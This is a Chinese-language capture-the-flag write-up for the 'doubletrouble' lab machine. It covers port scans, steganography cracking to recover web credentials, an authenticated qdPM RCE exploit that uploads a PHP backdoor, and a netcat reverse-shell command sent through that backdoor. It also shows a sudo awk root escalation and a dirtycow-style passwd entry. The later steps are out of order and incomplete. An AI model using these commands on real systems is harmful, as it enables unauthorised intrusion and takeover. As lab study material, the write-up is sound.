doubletrouble wp&复盘

因为这台机子形式比较特殊，所以做个wp
nmap

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ nmap -sT -p- 192.168.48.67
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:17 EDT
4. Nmap scan report for 192.168.48.67
5. Host is up (0.0058s latency).
6. Not shown: 65533 closed tcp ports (conn-refused)
7. PORT   STATE SERVICE
8. 22/tcp open  ssh
9. 80/tcp open  http
10. MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
12. Nmap done: 1 IP address (1 host up) scanned in 20.37 seconds

复制代码

详细扫描

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ nmap -sT -sC -sV -O -p22,80 192.168.48.67 -oA nmapscan/details
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
4. Nmap scan report for 192.168.48.67
5. Host is up (0.0019s latency).
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
11. |   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
12. |_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
13. 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
14. |_http-title: qdPM | Login
15. |_http-server-header: Apache/2.4.38 (Debian)
16. MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
17. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
18. Device type: general purpose|router
19. Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
20. OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
21. OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
22. Network Distance: 1 hop
23. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
25. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
26. Nmap done: 1 IP address (1 host up) scanned in 16.80 seconds

复制代码

脚本扫描

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ nmap --script=vuln -p22,80 192.168.48.67 -oA nmapscan/vuln
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
4. Nmap scan report for 192.168.48.67
5. Host is up (0.0017s latency).
7. PORT   STATE SERVICE
8. 22/tcp open  ssh
9. 80/tcp open  http
10. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
11. | http-internal-ip-disclosure:
12. |_  Internal IP Leaked: 127.0.1.1
13. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
14. | http-enum:
15. |   /backups/: Backup folder w/ directory listing
16. |   /robots.txt: Robots file
17. |   /batch/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
18. |   /core/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
19. |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
20. |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
21. |   /install/: Potentially interesting folder
22. |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
23. |   /secret/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
24. |   /template/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
25. |_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
26. |_http-csrf: Couldn't find any CSRF vulnerabilities.
27. |_http-dombased-xss: Couldn't find any DOM based XSS.
28. MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
30. Nmap done: 1 IP address (1 host up) scanned in 38.25 seconds

复制代码

由于只开放了两个端口，先看80端口
看到这样一个页面

可以看到一个CMS，qdPM 9.1，大致看了一下，要么是需要身份认证要么比较难利用

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ searchsploit qdPM 9.1
3. ---------------------------------------------------------------- ---------------------------------
4. Exploit Title                                                  |  Path
5. ---------------------------------------------------------------- ---------------------------------
6. qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting  | php/webapps/48486.txt
7. qdPM 9.1 - 'filter_by' SQL Injection                            | php/webapps/45767.txt
8. qdPM 9.1 - 'search[keywords]' Cross-Site Scripting              | php/webapps/46399.txt
9. qdPM 9.1 - 'search_by_extrafields[]' SQL Injection              | php/webapps/46387.txt
10. qdPM 9.1 - 'type' Cross-Site Scripting                          | php/webapps/46398.txt
11. qdPM 9.1 - Arbitrary File Upload                                | php/webapps/48460.txt
12. qdPM 9.1 - Remote Code Execution                                | php/webapps/47954.py
13. qdPM 9.1 - Remote Code Execution (Authenticated)                | php/webapps/50175.py
14. qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)     | php/webapps/50944.py
15. qdPM < 9.1 - Remote Code Execution                              | multiple/webapps/48146.py
16. ---------------------------------------------------------------- ---------------------------------
17. Shellcodes: No Results

复制代码

先看nmap的结果收集更多信息
有一个secret目录，可能藏有重要的线索
这里面有一个图片，下载下来
先看是否有嵌入文件

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ binwalk -e doubletrouble.jpg
4. DECIMAL       HEXADECIMAL     DESCRIPTION
5. --------------------------------------------------------------------------------
7. WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

复制代码

再看是否有隐写文件

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ steghide info doubletrouble.jpg
3. "doubletrouble.jpg":
4.   format: jpeg
5.   capacity: 4.7 KB
6. Try to get information about embedded data ? (y/n) y
7. Enter passphrase:

复制代码

看样子是有隐写的
我查看了其他的目录，均无信息
看来只有爆破了
这里可以用比较常见的stegcraker,
推荐用stegseek,爆破rockyou也只要几秒时间
瞬间得到密码

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt
3. StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
5. [i] Found passphrase: "92camaro"      
6. [i] Original filename: "creds.txt".
7. [i] Extracting to "doubletrouble.jpg.out".
9.                                                                                 
10. ┌──(kali㉿kali)-[~/replay/doubletr]
11. └─$ ls
12. doubletrouble.jpg  doubletrouble.jpg.out  nmapscan
13.                                                                                 
14. ┌──(kali㉿kali)-[~/replay/doubletr]
15. └─$ cat doubletrouble.jpg.out
16. otisrush@localhost.com
17. otis666                     

复制代码

尝试登录80
进入后台
这个时候就可以尝试之前searchspolit的Authenticated RCE,50175要报错，尝试50944

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ python3 50944.py -url http://192.168.206.67/ -u otisrush@localhost.com -p otis666
3. You are not able to use the designated admin account because they do not have a myAccount page.
5. The DateStamp is 2025-09-06 02:48
6. The DateStamp is 2025-09-16 01:41
7. Backdoor uploaded at - > http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=whoami

复制代码

发现可以成功利用
尝试反弹shell拿到初始shell

1. http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=nc%20192.168.206.200%201234%20-e%20/bin/bash

复制代码

拿到初始shell

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ nc -lvnp 1234           
3. listening on [any] 1234 ...
4. connect to [192.168.206.200] from (UNKNOWN) [192.168.206.67] 33996
5. ls
6. 584189-backdoor.php
7. 807754-backdoor.php
8. 895627-backdoor.php
9. python -c 'import pty;pty.spawn("/bin/bash")'
10. www-data@doubletrouble:/var/www/html/uploads/users$ ls
11. ls
12. 584189-backdoor.php  807754-backdoor.php  895627-backdoor.php
13. www-data@doubletrouble:/var/www/html/uploads/users$

复制代码

1. www-data@doubletrouble:/var/www/html/uploads/users$ sudo -l
2. sudo -l
3. Matching Defaults entries for www-data on doubletrouble:
4.     env_reset, mail_badpass,
5.     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
7. User www-data may run the following commands on doubletrouble:
8.     (ALL : ALL) NOPASSWD: /usr/bin/awk

复制代码

允许以root身份无密码执行awk
在gtfobins上找awk
查得可以执行

1. sudo awk 'BEGIN {system("/bin/sh")}'

复制代码

1. www-data@doubletrouble:/var/www/html/uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
2. <uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
3. # id
4. id
5. uid=0(root) gid=0(root) groups=0(root)
6. # cd /root
7. cd /root
8. # ls
9. ls
10. doubletrouble.ova
11. #

复制代码

这个脚本大概是可以把一个root的文件里面的内容随意替换，但是我试了一下，/etc/passwd里面的内容是可以修改，但是有格式不齐等问题
再试试dirtycow2

1. # passwd root
2. passwd root
3. New password: 123
5. Retype new password: 123
7. passwd: password updated successfully

复制代码

1. ┌──(kali㉿kali)-[~/replay/doubletr]
2. └─$ scp root@192.168.206.67:/root/doubletrouble.ova .
3. The authenticity of host '192.168.206.67 (192.168.206.67)' can't be established.
4. ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
5. This host key is known by the following other names/addresses:
6.     ~/.ssh/known_hosts:12: [hashed name]
7.     ~/.ssh/known_hosts:18: [hashed name]
8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
9. Warning: Permanently added '192.168.206.67' (ED25519) to the list of known hosts.
10. root@192.168.206.67's password:
11. doubletrouble.ova            

复制代码

1. ┌──(kali㉿kali)-[~/replay/doubletr/inner]
2. └─$ nmap -sT -p- 192.168.206.76 -oA nmapscan/ports
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:04 EDT
4. Nmap scan report for 192.168.206.76
5. Host is up (0.0024s latency).
6. Not shown: 65533 closed tcp ports (conn-refused)
7. PORT   STATE SERVICE
8. 22/tcp open  ssh
9. 80/tcp open  http
10. MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
12. Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds

复制代码

这个脚本相当于创建了一个拥有root权限的用户，还给你留了恢复的备份

1. ┌──(kali㉿kali)-[~/replay/doubletr/inner]
2. └─$ nmap -sT -sC -sV -O -p22,80 192.168.206.76 -oA nmapscan/details
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:05 EDT
4. Nmap scan report for 192.168.206.76
5. Host is up (0.0013s latency).
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
9. | ssh-hostkey:
10. |   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
11. |   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
12. |_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
13. 80/tcp open  http    Apache httpd 2.2.22 ((Debian))
14. |_http-title: Site doesn't have a title (text/html).
15. |_http-server-header: Apache/2.2.22 (Debian)
16. MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
17. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
18. Device type: general purpose
19. Running: Linux 3.X
20. OS CPE: cpe:/o:linux:linux_kernel:3
21. OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
22. Network Distance: 1 hop
23. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
25. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
26. Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds

复制代码

成功拿到root权限
对这个新建的用户，顺便学习一下/etc/passwd：
输出 firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash /sbin:/bin/sh
这是 /etc/passwd 文件中的一行，代表一个用户账户。在 Linux 中，每一行都用冒号 : 分隔成不同的字段，每个字段都有特定的含义。
正常的一行通常有 7 个字段，格式为：
用户名:密码:用户ID:组ID:描述:家目录:登录Shell
这一行：

• fiRbwOlRgkx7g: 密码。在现代 Linux 系统中，这个字段通常只是一个占位符 x，真正的加密密码存储在另一个文件 /etc/shadow 里，只有 root 用户能读取。这里直接出现了看似加密的字符串，这是一个巨大的安全风险。它表明系统可能使用了旧式的、不安全的密码存储方式，或者这个账户是被故意这样设置的，以便攻击者可以使用这个密码直接登录。
  
• 0: 用户ID。这是用户的唯一数字标识。UID 为 0 的用户是 root 用户，拥有系统上的最高权限。这是一个极其危险的信号。
  
• 0: 组ID。这是用户主要所属组的数字标识。GID 为 0 通常是 root 组，再次确认了这个账户拥有超级用户权限。
  
• pwned: 描述（也称为 GECOS 字段）。通常这里会写用户的全名或描述。这里的 “pwned” 是黑客术语，意思是“已被攻破”，这几乎明确宣告了该系统已经被入侵。
  
• /root: 家目录。这是用户登录后所在的初始工作目录。普通用户的家目录通常在 /home/ 下，而 /root 是 root 用户的家目录。这进一步证明该账户具有 root 权限。
  
• /bin/bash /sbin:/bin/sh: 登录Shell。这是用户登录后启动的命令行解释器。正常的格式应该只有一个 shell 路径（如 /bin/bash）。这里的 /bin/bash /sbin:/bin/sh 格式错误且混乱，看起来像是攻击者在匆忙添加账户时拼接了多个路径，但系统实际上只会尝试执行第一个部分 /bin/bash。
  

  
来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！